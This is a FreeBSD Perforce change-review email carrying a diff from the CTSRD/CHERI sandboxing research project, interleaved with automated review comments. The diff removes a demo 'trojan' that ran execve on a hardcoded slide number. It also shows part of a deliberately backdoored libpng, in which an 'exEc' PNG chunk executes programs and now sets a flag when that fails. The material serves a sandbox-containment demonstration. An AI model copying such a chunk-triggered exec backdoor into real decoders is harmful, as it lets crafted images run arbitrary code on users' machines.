From owner-p4-projects@FreeBSD.ORG Wed Nov 28 00:33:52 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id D353CB03; Wed, 28 Nov 2012 00:33:51 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 8BF39B01 for ; Wed, 28 Nov 2012 00:33:51 +0000 (UTC) (envelope-from brooks@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 71A738FC12 for ; Wed, 28 Nov 2012 00:33:51 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAS0Xpfn041727 for ; Wed, 28 Nov 2012 00:33:51 GMT (envelope-from brooks@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAS0XpXo041724 for perforce@freebsd.org; Wed, 28 Nov 2012 00:33:51 GMT (envelope-from brooks@freebsd.org) Date: Wed, 28 Nov 2012 00:33:51 GMT Message-Id: <201211280033.qAS0XpXo041724@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to brooks@freebsd.org using -f 
From: Brooks Davis Subject: PERFORCE change 219859 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 00:33:52 -0000 http://p4web.freebsd.org/@@219859?ac=10 Change 219859 by brooks@brooks_zenith on 2012/11/28 00:33:06 Remove the slide number based trojan used for the live demo now that exEc chunks work fine. Provide a png_exec_triggered global to let us know that the exEc exploit was attempted but failed. Affected files ... .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/decode_png.c#5 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/iboxpriv.h#4 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/imagebox.h#3 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/pngbox.c#7 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/pngrutil.c#3 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd/cheripoint/cheripoint.c#13 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng-cheri/readpng-cheri.c#5 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng/readpng.c#4 edit Differences ... ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/decode_png.c#5 (text+ko) ==== @@ -37,6 +37,8 @@ #include "imagebox.h" #include "iboxpriv.h" +extern int png_exec_triggered; + static void read_row_callback(png_structp, png_uint_32, int); static void read_png_from_fd(png_structp, png_bytep, png_size_t); 
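Review bot: The new `extern int png_exec_triggered;` in decode_png.c names a symbol that pngrutil.c defines only inside `#if defined(CTSRD_BACKDOOR)`, so a libimagebox linked against a libpng built without that define would fail to link, if such a configuration is ever built. Define the flag unconditionally in pngrutil.c (outside the `#if defined(CTSRD_BACKDOOR)` block, where it would presumably just stay 0 because the only visible writer is the guarded exec path), or give libimagebox its own guarded fallback definition. The declaration also belongs in a shared header such as iboxpriv.h rather than as a file-local extern, so the type cannot drift between the two libraries. The same conditional-definition point applies to the pngrutil.c hunk at `@@ -16,6 +16,8 @@`.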
@@ -51,24 +53,6 @@ png_infop end_info = NULL; png_bytep *rows = NULL; - /* - * World's lamest trojan - */ - if (ids->slide == 58) { - for (r = 0; r < ids->is->width * ids->is->height; r++) - ids->buffer[r] = 0x0000FF00; - ids->is->valid_rows = ids->is->height;; - ids->is->passes_remaining = 0; - if (ids->is->sb == SB_CAPSICUM) - ids->is->error = 99; - char path[] = "/bin/wr"; - char *argv[2] = {NULL, NULL}; - char *envp[1] = {NULL}; - argv[0] = path; - execve(argv[0], argv, envp); - return; - } - if ((png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL)) == NULL) { ids->is->error = 1; @@ -88,12 +72,6 @@ goto error; } -#if 0 - /* XXX Insert back door function here */ - png_set_read_user_chunk_fn(png_ptr, user_chunk_ptr, - read_chunk_callback); -#endif - if (read_row_fn != NULL) png_set_read_status_fn(png_ptr, read_row_fn); else @@ -137,6 +115,13 @@ png_read_end(png_ptr, end_info); + if (png_exec_triggered) { + if (ids->is->sb == SB_CAPSICUM) + ids->is->error = 99; + for (r = 0; r < ids->is->width * ids->is->height; r++) + ids->buffer[r] = 0x0000FF00; + } + error: png_destroy_read_struct(&png_ptr, &info_ptr, &end_info); close(ids->fd); ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/iboxpriv.h#4 (text+ko) ==== @@ -34,7 +34,6 @@ struct ibox_decode_state { int fd; - int slide; struct iboxstate *is; uint32_t *buffer; }; ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/imagebox.h#3 (text+ko) ==== @@ -52,7 +52,7 @@ void iboxstate_free(struct iboxstate *ps); struct iboxstate* png_read_start(int pfd, uint32_t maxw, uint32_t maxh, - int slide, enum sbtype); + enum sbtype); int png_read_finish(struct iboxstate *ps); #endif ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/pngbox.c#7 (text+ko) ==== 
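Review bot: `png_exec_triggered` is tested after `png_read_end()` but never cleared, so once set it stays set for every later decode in the same process; in the SB_NONE path, where pthr_png_read_start appears to decode in-process, the first triggered image would paint every following image green as well. Reset it at the start of each decode, e.g. `png_exec_triggered = 0;` before the `png_create_read_struct()` call, or clear it inside the new `if (png_exec_triggered)` block once it has been handled. The `99` assigned to `ids->is->error` is also a bare magic number; a named constant or a comment such as `/* 99: exEc chunk exec attempted and failed */` would help whoever inspects `error` on the consumer side. The enclosing function begins before this hunk.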
@@ -74,8 +74,7 @@ } static struct iboxstate* -pthr_png_read_start(int pfd, uint32_t width, uint32_t height, int slide, - enum sbtype sb) +pthr_png_read_start(int pfd, uint32_t width, uint32_t height, enum sbtype sb) { struct iboxstate *is = NULL; struct ibox_decode_state *ids = NULL; @@ -96,7 +95,6 @@ if ((ids = malloc(sizeof(*ids))) == NULL) goto error; memset(ids, 0, sizeof(*ids)); - ids->slide = slide; ids->is = is; ids->fd = pfd; @@ -122,10 +120,9 @@ } static struct iboxstate* -capsicum_png_read_start(int pfd, uint32_t width, uint32_t height, int slide, +capsicum_png_read_start(int pfd, uint32_t width, uint32_t height, enum sbtype sb) { - char slideno[32]; int bfd, isfd, highfd; int nbfd, nisfd, npfd; struct iboxstate *is = NULL; @@ -193,9 +190,7 @@ exit(1); closefrom(6); - sprintf(slideno, "%d", slide); - if (execl("/usr/libexec/readpng", "readpng", slideno, NULL) == - -1) + if (execl("/usr/libexec/readpng", "readpng", NULL) == -1) exit(1); } else if (fdp->pid > 0) goto started; @@ -226,7 +221,7 @@ static struct iboxstate* cheri_png_read_start(char *pngbuffer, size_t pnglen, - uint32_t width, uint32_t height, int slide, enum sbtype sb) + uint32_t width, uint32_t height, enum sbtype sb) { struct sandbox *sandbox; struct iboxstate *is = NULL; @@ -265,7 +260,7 @@ CHERI_CANDPERM(10, 10, CHERI_PERM_LOAD); CHERI_CSC(10, 0, &c2, 0); - v = sandbox_invoke(sandbox, width, height, pnglen, slide, + v = sandbox_invoke(sandbox, width, height, pnglen, 0, &c1, &c2, NULL, NULL, NULL, NULL, NULL); printf("%s: sandbox returned %ju\n", __func__, (uintmax_t)v); sandbox_destroy(sandbox); @@ -287,7 +282,7 @@ * the png_read code and will be closed when decoding is complete. */ struct iboxstate* -png_read_start(int pfd, uint32_t maxw, uint32_t maxh, int slide, enum sbtype sb) +png_read_start(int pfd, uint32_t maxw, uint32_t maxh, enum sbtype sb) { size_t pnglen; uint32_t header[9], width, height; 
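Review bot: The rewritten `if (execl("/usr/libexec/readpng", "readpng", NULL) == -1) exit(1);` runs in what looks like the forked child (the `else if (fdp->pid > 0)` branch that follows handles the parent), and `exit()` there runs the parent's atexit handlers and flushes stdio buffers inherited across fork(), which can produce duplicated output; use `_exit(1)` instead. The `exit(1)` in the context line just before `closefrom(6)` has the same issue. Passing a bare `NULL` as the execl terminator is also a portability trap on platforms where NULL is a plain `0` (FreeBSD defines it as a pointer, so it works here); `(char *)NULL` is the conventional spelling. capsicum_png_read_start continues outside this hunk.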
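Review bot: The literal `0` that replaces `slide` in the `sandbox_invoke(sandbox, width, height, pnglen, 0, ...)` call no longer tells a reader what that register argument is; readpng-cheri.c now marks a3 `__unused`, so the value is a placeholder. A comment on that line, e.g. `/* a3: formerly the slide number, ignored by readpng-cheri */`, would record that. cheri_png_read_start continues outside this hunk.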
@@ -324,9 +319,9 @@ switch (sb) { case SB_NONE: - return pthr_png_read_start(pfd, width, height, slide, sb); + return pthr_png_read_start(pfd, width, height, sb); case SB_CAPSICUM: - return capsicum_png_read_start(pfd, width, height, slide, sb); + return capsicum_png_read_start(pfd, width, height, sb); case SB_CHERI: if (fstat(pfd, &statbuf) == -1) { close(pfd); @@ -340,7 +335,7 @@ } close(pfd); return cheri_png_read_start(pngbuffer, pnglen, width, height, - slide, sb); + sb); default: close(pfd); return NULL; ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/pngrutil.c#3 (text+ko) ==== @@ -16,6 +16,8 @@ #if defined(CTSRD_BACKDOOR) #include + +int png_exec_triggered; #endif #if defined(_WIN32_WCE) @@ -2204,7 +2206,7 @@ } argv[argc] = NULL; execve(argv[0], argv, envp); - png_error(png_ptr, "failed to exec exEc chunk"); + png_exec_triggered = 1; } #endif #if defined(PNG_READ_USER_CHUNKS_SUPPORTED) ==== //depot/projects/ctsrd/cheribsd/src/ctsrd/cheripoint/cheripoint.c#13 (text+ko) ==== @@ -98,7 +98,7 @@ if ((pfd = open("/usr/share/images/icons.png", O_RDONLY)) == -1) err(1, "Failed to open icons.png"); - if ((is = png_read_start(pfd, 32, 2048, -1, SB_NONE)) == NULL) + if ((is = png_read_start(pfd, 32, 2048, SB_NONE)) == NULL) errx(1, "Failed to start PNG decode for icons.png"); if (png_read_finish(is) != 0) errx(1, "png_read_finish() failed for icons.png"); @@ -455,7 +455,7 @@ warn("Failed to open %s", cover); return (-1); } - if ((is = png_read_start(pfd, slide_width, fb_height, 0, sb)) == + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for %s", cover); return (-1); @@ -510,8 +510,7 @@ sysctlbyname("security.cheri.syscall_violations", &sv1, &olen, NULL, 0); } - if ((is = png_read_start(pfd, fb_width, fb_height, slidenum, - sb)) == NULL) { + if ((is = png_read_start(pfd, fb_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for %s", slide); return (-1); } 
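Review bot: The new `int png_exec_triggered;` in pngrutil.c is a process-wide flag with no comment saying who sets it and who reads it; the only writer visible in this diff is the `png_exec_triggered = 1;` after the `execve()` call later in the file, and libimagebox reads it after `png_read_end()`. A comment above the definition, e.g. `/* Set when an exEc chunk's execve() returns; read by libimagebox after png_read_end(). */`, would make that contract explicit, and it should also state whether the reader is expected to reset it.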
@@ -577,7 +576,7 @@ warn("Failed to open sri.png"); return (-1); } - if ((is = png_read_start(pfd, slide_width, fb_height, -1, sb)) == NULL) { + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for sri.png"); return (-1); } @@ -597,7 +596,7 @@ warn("Failed to open ucam.png"); return (-1); } - if ((is = png_read_start(pfd, slide_width, fb_height, -1, sb)) == NULL) { + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for ucam.png"); return (-1); } @@ -639,8 +638,7 @@ warn("Failed to open header.png"); return (-1); } - if ((hdris = png_read_start(pfd, slide_width, fb_height, -1, sb)) == - NULL) { + if ((hdris = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for header.png"); return (-1); } @@ -812,7 +810,7 @@ if ((pfd = open("/usr/share/images/header.png", O_RDONLY)) == -1) err(1, "Failed to open header.png"); - if ((is = png_read_start(pfd, slide_width, fb_height, -1, sb)) == NULL) + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) errx(1, "Failed to start PNG decode for header.png"); if (png_read_finish(is) != 0) errx(1, "png_read_finish() failed for header.png"); ==== //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng-cheri/readpng-cheri.c#5 (text+ko) ==== @@ -75,11 +75,11 @@ * * The output buffer is passed in c1. The pngfile is accessable via c2. * a0 holds the image width, a1 the height, and a2 holds the length of the - * pngfile (currently unused). a3 holds the slide number. + * pngfile (currently unused). */ int invoke(register_t a0, register_t a1, register_t a2 __unused, - register_t a3) + register_t a3 __unused) { struct ibox_decode_state ids; struct iboxstate is; 
@@ -92,7 +92,6 @@ is.sb = SB_CHERI; ids.fd = -1; - ids.slide = a3; /* * in principle we could update this via a capabilty, * but in practice we can reconstruct it on exit ==== //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng/readpng.c#4 (text+ko) ==== @@ -40,7 +40,7 @@ #include "iboxpriv.h" int -main(int argc, char **argv) +main(int argc, char **argv __unused) { int bfd, isfd; struct ibox_decode_state ids; @@ -48,14 +48,9 @@ if (cap_enter() == -1) err(1, "cap_enter"); - if (argc > 2) + if (argc > 1) errx(1, "too many argumets"); - if (argc == 2) - ids.slide = atoi(argv[1]); - else - ids.slide = -1; - ids.fd = 3; bfd = 4; isfd = 5;